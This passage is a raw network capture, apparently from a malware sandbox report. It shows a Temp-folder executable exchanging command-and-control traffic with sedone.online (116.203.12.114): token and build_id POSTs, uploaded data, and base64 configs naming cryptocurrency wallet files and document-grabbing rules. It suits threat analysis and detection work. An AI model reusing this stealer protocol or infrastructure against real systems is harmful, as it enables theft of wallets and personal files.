AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50153	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:05 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----NOZ5XT2689RQQIMG479H User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:05 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 4f 5a 35 58 54 32 36 38 39 52 51 51 49 4d 47 34 37 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 5a 35 58 54 32 36 38 39 52 51 51 49 4d 47 34 37 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 5a 35 58 54 32 36 38 39 52 51 51 49 4d 47 34 37 39 48 0d 0a 43 6f 6e 74 Data Ascii: ------NOZ5XT2689RQQIMG479HContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------NOZ5XT2689RQQIMG479HContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------NOZ5XT2689RQQIMG479HCont
2024-12-16 10:05:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:05 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-16 10:05:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50155	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:07 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FKXBA1N7QIEUAAA1NGVK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:07 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 Data Ascii: ------FKXBA1N7QIEUAAA1NGVKContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------FKXBA1N7QIEUAAA1NGVKContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------FKXBA1N7QIEUAAA1NGVKCont
2024-12-16 10:05:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:08 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50156	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:09 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----79HDJ5FK6F37QQIECBS0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:09 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 39 48 44 4a 35 46 4b 36 46 33 37 51 51 49 45 43 42 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 44 4a 35 46 4b 36 46 33 37 51 51 49 45 43 42 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 44 4a 35 46 4b 36 46 33 37 51 51 49 45 43 42 53 30 0d 0a 43 6f 6e 74 Data Ascii: ------79HDJ5FK6F37QQIECBS0Content-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------79HDJ5FK6F37QQIECBS0Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------79HDJ5FK6F37QQIECBS0Cont
2024-12-16 10:05:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:10 UTC	536	IN	Data Raw: 32 30 63 0d 0a 5a 47 6c 7a 66 43 56 45 55 6b 6c 57 52 56 39 47 53 56 68 46 52 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 63 6d 56 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 64 58 4e 38 4a 56 56 54 52 56 4a 51 55 6b 39 47 53 55 78 46 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 71 63 47 63 73 4b 69 35 71 63 47 56 6e 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 5a 57 5a 68 64 57 78 30 66 43 56 45 54 30 4e 56 54 55 Data Ascii: 20cZGlzfCVEUklWRV9GSVhFRCVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8cmV8JURSSVZFX1JFTU9WQUJMRSVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8dXN8JVVTRVJQUk9GSUxFJVx8Ki50eHQsKi5qcGcsKi5qcGVnfDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50158	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:11 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAS00ZCJ5XBAAIW4ECBS User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:11 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 53 30 30 5a 43 4a 35 58 42 41 41 49 57 34 45 43 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 53 30 30 5a 43 4a 35 58 42 41 41 49 57 34 45 43 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 53 30 30 5a 43 4a 35 58 42 41 41 49 57 34 45 43 42 53 0d 0a 43 6f 6e 74 Data Ascii: ------AAS00ZCJ5XBAAIW4ECBSContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------AAS00ZCJ5XBAAIW4ECBSContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------AAS00ZCJ5XBAAIW4ECBSCont
2024-12-16 10:05:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:12 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50160	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:13 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----168Q1DJEUA1N7QIE3E3O User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:13 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 36 38 51 31 44 4a 45 55 41 31 4e 37 51 49 45 33 45 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 31 36 38 51 31 44 4a 45 55 41 31 4e 37 51 49 45 33 45 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 31 36 38 51 31 44 4a 45 55 41 31 4e 37 51 49 45 33 45 33 4f 0d 0a 43 6f 6e 74 Data Ascii: ------168Q1DJEUA1N7QIE3E3OContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------168Q1DJEUA1N7QIE3E3OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------168Q1DJEUA1N7QIE3E3OCont
2024-12-16 10:05:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:14 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50161	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
